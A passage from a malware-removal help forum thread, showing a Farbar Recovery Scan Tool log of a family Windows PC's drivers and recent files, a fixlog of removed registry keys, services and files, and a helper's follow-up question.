R1 SCDEmu; C:\Windows\system32\Drivers\SCDEmu.sys [59388 2009-11-08] (PowerISO Computing, Inc.) [File not signed]
R2 VBoxAswDrv; C:\Program Files\Alwil Software\Avast5\ng\vbox\VBoxAswDrv.sys [218192 2014-10-26] (Avast Software)
S3 zghsdiag; C:\Windows\System32\DRIVERS\zghsdiag.sys [106752 2011-05-26] (ZTE Incorporated)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [106752 2011-05-26] (ZTE Incorporated)
S3 zghsnmea; C:\Windows\System32\DRIVERS\zghsnmea.sys [106752 2011-05-26] (ZTE Incorporated)

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-02 06:56 - 2014-11-02 06:56 - 06000640 _____ () C:\Program Files\GUTF4EF.tmp
2014-11-02 06:56 - 2014-11-02 06:56 - 00000000 ____D () C:\Program Files\GUMF4EE.tmp
2014-11-02 06:53 - 2014-11-02 06:53 - 00000000 ____D () C:\Users\Nick\Desktop\FRST-OlderVersion
2014-11-01 21:23 - 2014-11-02 06:53 - 01106432 _____ (Farbar) C:\Users\Nick\Desktop\FRST.exe
2014-11-01 11:39 - 2014-11-01 11:39 - 00000199 _____ () C:\Windows\system32\2014-11-01-19-39-27.021-AvastVBoxSVC.exe-2552.log
2014-11-01 11:31 - 2014-11-01 11:31 - 00000249 _____ () C:\Windows\system32\2014-11-01-19-31-32.097-aswFe.exe-4892.log
2014-11-01 11:16 - 2014-11-01 11:31 - 00000249 _____ () C:\Windows\system32\2014-11-01-19-16-09.090-aswFe.exe-4424.log
2014-11-01 11:16 - 2014-11-01 11:16 - 00000199 _____ () C:\Windows\system32\2014-11-01-19-16-00.068-AvastVBoxSVC.exe-3784.log
2014-11-01 11:04 - 2014-11-01 11:04 - 00000000 ____D () C:\Windows\Sun
2014-11-01 11:02 - 2014-11-01 11:02 - 00000000 ____D () C:\Program Files\Common Files\Java
2014-11-01 11:02 - 2014-11-01 11:00 - 00096680 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge.dll
2014-11-01 11:01 - 2014-11-01 11:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-11-01 10:58 - 2014-11-01 10:58 - 00638376 _____ (Oracle Corporation) C:\Users\Nick\Desktop\jre-8u25-windows-i586-iftw.exe
2014-11-01 10:55 - 2014-11-01 10:55 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-11-01 10:48 - 2014-11-02 07:07 - 00020267 _____ () C:\Users\Nick\Desktop\FRST.txt
2014-11-01 10:45 - 2014-11-01 10:45 - 00002333 _____ () C:\Users\Nick\Desktop\JRT.txt
2014-11-01 10:38 - 2014-11-01 10:38 - 00000000 ____D () C:\Windows\ERUNT
2014-11-01 10:37 - 2014-11-01 10:38 - 00000000 ____D () C:\Windows\system32\vbox
2014-11-01 10:37 - 2014-11-01 10:37 - 01706359 _____ (Thisisu) C:\Users\Nick\Desktop\JRT.exe
2014-11-01 09:57 - 2010-08-30 07:34 - 00536576 _____ (SQLite Development Team) C:\Windows\system32\sqlite3.dll
2014-11-01 09:55 - 2014-11-01 10:32 - 00000000 ____D () C:\AdwCleaner
2014-11-01 09:55 - 2014-11-01 09:55 - 01375089 _____ () C:\Users\Nick\Desktop\AdwCleaner.exe
2014-11-01 09:22 - 2014-11-01 09:52 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-11-01 09:21 - 2014-11-01 09:52 - 00000000 ____D () C:\Users\Nick\Desktop\mbar
2014-11-01 09:20 - 2014-11-01 09:20 - 14349744 _____ (Malwarebytes Corp.) C:\Users\Nick\Desktop\mbar-1.07.0.1012.exe
2014-11-01 09:09 - 2014-11-01 09:09 - 00039769 _____ () C:\Users\Nick\Desktop\Addition.txt
2014-11-01 09:07 - 2014-11-02 07:07 - 00000000 ____D () C:\FRST
2014-11-01 08:52 - 2014-11-01 08:52 - 00854448 _____ () C:\Users\Nick\Desktop\SecurityCheck.exe
2014-10-28 11:23 - 2014-10-28 11:23 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\UltraVNC
2014-10-28 11:14 - 2014-10-28 11:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UltraVNC
2014-10-28 11:14 - 2014-10-28 11:14 - 00000000 ____D () C:\Program Files\uvnc bvba
2014-10-26 20:28 - 2014-10-26 20:28 - 00291352 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2014-10-26 20:28 - 2014-10-26 20:28 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2014-10-26 20:28 - 2014-10-26 20:28 - 00001842 _____ () C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2014-10-26 20:18 - 2014-10-26 20:23 - 00004245 _____ () C:\Windows\system32\jupdate-1.7.0_71-b14.log
2014-10-26 19:55 - 2014-10-26 19:55 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{C904B1C1-3E1E-4488-AF25-7A18B11AC300}
2014-10-26 18:59 - 2014-11-01 09:22 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-26 18:56 - 2014-10-26 18:56 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2014-10-26 18:56 - 2014-10-26 18:56 - 00000000 ____D () C:\ProgramData\McAfee Security Scan
2014-10-26 18:56 - 2014-10-26 18:56 - 00000000 ____D () C:\Program Files\McAfee Security Scan
2014-10-26 17:22 - 2014-10-26 17:26 - 00000859 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-26 17:22 - 2014-10-26 17:22 - 00000000 ____D () C:\Users\Dylan\AppData\Roaming\Malwarebytes
2014-10-22 17:44 - 2014-10-22 17:45 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{65D13997-5F32-456F-9964-9BB07D32E768}
2014-10-21 02:17 - 2014-06-15 14:18 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-21 02:17 - 2014-06-13 10:22 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-21 02:17 - 2014-06-13 10:22 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 03637248 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00834048 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00671744 _____ (Microsoft Corporation) C:\Windows\system32\mstime.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00498688 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00480768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00380928 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00193024 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00180736 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-21 02:16 - 2014-09-23 15:37 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-21 02:16 - 2014-09-23 15:36 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-21 02:16 - 2014-09-23 15:36 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-21 02:16 - 2014-09-23 15:36 - 00019968 _____ (Microsoft Corporation) C:\Windows\system32\corpol.dll
2014-10-21 02:16 - 2014-09-23 14:27 - 01383424 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-21 02:15 - 2014-09-23 15:37 - 06119936 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-21 02:15 - 2014-09-23 15:37 - 01827328 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-21 02:15 - 2014-09-23 15:37 - 01177600 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-21 02:15 - 2014-09-23 10:05 - 00389632 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-10-21 02:13 - 2014-09-27 15:29 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-21 02:03 - 2014-09-04 15:27 - 00143360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys
2014-10-21 02:00 - 2014-09-16 08:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-09 07:47 - 2014-10-09 07:47 - 00155248 _____ () C:\Windows\Minidump\Mini100914-01.dmp
2014-10-09 07:22 - 2014-10-09 07:22 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{69E0C68D-60C0-41AE-8CBC-FD37C8FBD37E}

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-02 07:08 - 2010-11-25 20:52 - 00000416 ____H () C:\Windows\Tasks\User_Feed_Synchronization-{C479CE1A-76B9-4D6F-8D71-575C334B2024}.job
2014-11-02 07:07 - 2006-11-02 04:35 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-11-02 07:06 - 2012-04-03 10:24 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-02 07:05 - 2010-11-20 20:01 - 00000420 ____H () C:\Windows\Tasks\User_Feed_Synchronization-{F9D43FD3-5681-4AEF-A862-17FF1653F989}.job
2014-11-02 07:04 - 2010-11-20 19:35 - 00000878 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-02 07:01 - 2013-10-20 10:02 - 00807446 _____ () C:\Windows\PFRO.log
2014-11-02 07:01 - 2006-11-02 05:00 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-02 07:01 - 2006-11-02 04:46 - 00004048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-02 07:01 - 2006-11-02 04:46 - 00004048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-02 07:00 - 2012-04-18 15:44 - 01850397 _____ () C:\Windows\WindowsUpdate.log
2014-11-02 07:00 - 2006-11-02 05:00 - 00032556 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-11-02 06:53 - 2010-11-20 19:49 - 00000000 ____D () C:\Users\Nick
2014-11-02 06:53 - 2006-11-02 03:18 - 00000000 ___RD () C:\Users\Public
2014-11-02 06:33 - 2010-11-20 19:35 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-02 06:16 - 2013-04-10 13:22 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003UA.job
2014-11-01 11:38 - 2012-04-27 18:39 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-11-01 11:03 - 2013-10-16 08:39 - 00000000 ____D () C:\ProgramData\Oracle
2014-11-01 11:01 - 2010-12-24 19:28 - 00000000 ____D () C:\Program Files\Opera
2014-11-01 10:59 - 2010-12-06 16:58 - 00000000 ____D () C:\Program Files\Java
2014-11-01 09:55 - 2014-08-31 10:57 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-11-01 07:16 - 2013-04-10 13:22 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003Core.job
2014-10-31 20:28 - 2011-07-07 11:05 - 00787800 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys
2014-10-31 20:28 - 2010-11-20 19:35 - 00070384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswmonflt.sys
2014-10-28 16:14 - 2014-07-06 18:10 - 00000000 ____D () C:\ProgramData\65214779c8ff1a47
2014-10-28 16:02 - 2014-08-19 05:10 - 00000000 ____D () C:\Users\Bill\AppData\Roaming\DropboxMaster
2014-10-28 16:02 - 2011-08-22 16:24 - 00000000 ____D () C:\Users\Bill\AppData\Roaming\Dropbox
2014-10-28 11:06 - 2013-10-19 10:31 - 00004923 _____ () C:\Windows\setupact.log
2014-10-28 05:35 - 2010-11-21 09:12 - 00229000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-26 20:54 - 2011-05-04 20:14 - 00000000 ____D () C:\Users\Hannah\AppData\Roaming\uTorrent
2014-10-26 20:53 - 2013-04-14 18:04 - 00000000 ____D () C:\Users\Hannah\Tracing
2014-10-26 20:53 - 2010-11-22 18:19 - 00000000 ____D () C:\Users\Hannah\AppData\Local\LogMeIn Hamachi
2014-10-26 20:52 - 2014-06-03 18:50 - 00000000 ____D () C:\Users\Hannah\AppData\Local\Backup Assistant Plus
2014-10-26 20:28 - 2014-08-01 10:54 - 00024184 _____ () C:\Windows\system32\Drivers\aswHwid.sys
2014-10-26 20:28 - 2013-09-07 16:22 - 00206248 _____ () C:\Windows\system32\Drivers\aswVmm.sys
2014-10-26 20:28 - 2013-09-07 16:22 - 00049944 _____ () C:\Windows\system32\Drivers\aswRvrt.sys
2014-10-26 20:28 - 2010-11-20 19:35 - 00422760 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2014-10-26 20:28 - 2010-11-20 19:35 - 00057928 _____ (AVAST Software) C:\Windows\system32\Drivers\aswTdi.sys
2014-10-26 20:28 - 2010-11-20 19:35 - 00055240 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr.sys
2014-10-26 20:02 - 2012-12-16 22:41 - 00000680 _____ () C:\Users\Dylan\AppData\Local\d3d9caps.dat
2014-10-26 18:57 - 2012-12-14 00:04 - 00000000 ____D () C:\Users\Dylan\AppData\Local\Adobe
2014-10-26 18:56 - 2012-04-03 10:24 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-10-26 18:56 - 2011-08-21 08:55 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-10-26 18:52 - 2012-10-20 18:44 - 00000000 ____D () C:\Windows\WinBrick.96
2014-10-26 17:26 - 2014-08-31 10:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-26 17:26 - 2014-08-31 10:57 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-21 02:52 - 2006-11-02 03:18 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-21 02:38 - 2006-11-02 04:46 - 03688432 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-21 02:12 - 2013-08-20 02:09 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-21 02:03 - 2006-11-02 02:24 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-10-09 08:07 - 2006-11-02 03:18 - 00000000 ____D () C:\Windows\rescache
2014-10-09 08:06 - 2014-09-28 15:10 - 00000000 ____D () C:\Users\Hannah\Desktop\Nick
2014-10-09 08:01 - 2010-12-25 10:51 - 00008192 _____ () C:\Users\Hannah\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-10-09 07:47 - 2011-01-14 20:43 - 00000000 ____D () C:\Windows\Minidump
2014-10-09 07:46 - 2013-12-12 08:39 - 274563712 _____ () C:\Windows\MEMORY.DMP

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-11-01 23:56

==================== End Of Log ============================

 

 

 

 

 

 

 

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 02-11-2014
Ran by Nick at 2014-11-02 06:53:32 Run:1
Running from C:\Users\Nick\Desktop
Loaded Profile: Nick (Available profiles: Kristi & Hannah & Nick & Bill & UpdatusUser & Dylan & Administrator)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
start
EmptyTemp:
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
CHR HKCU\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 radpms; system32\DRIVERS\radpms.sys [X]
C:\Users\Nick\random.dat
C:\Users\Public\replace.bat
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [AdobeBridge] => [X]
end
*****************

"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
"HKCU\SOFTWARE\Policies\Google" => Key deleted successfully.
blbdrive => Service deleted successfully.
IpInIp => Service deleted successfully.
lmimirr => Service deleted successfully.
NwlnkFlt => Service deleted successfully.
NwlnkFwd => Service deleted successfully.
radpms => Service deleted successfully.
C:\Users\Nick\random.dat => Moved successfully.
C:\Users\Public\replace.bat => Moved successfully.
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge => value deleted successfully.
EmptyTemp: => Removed 2.3 GB temporary data.


The system needed a reboot.

==== End of Fixlog ====



#15 Jo*

Jo*

  • Malware Response Team
  • 3,319 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:33 PM

Posted 02 November 2014 - 10:53 AM

How the Computer is running now?

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users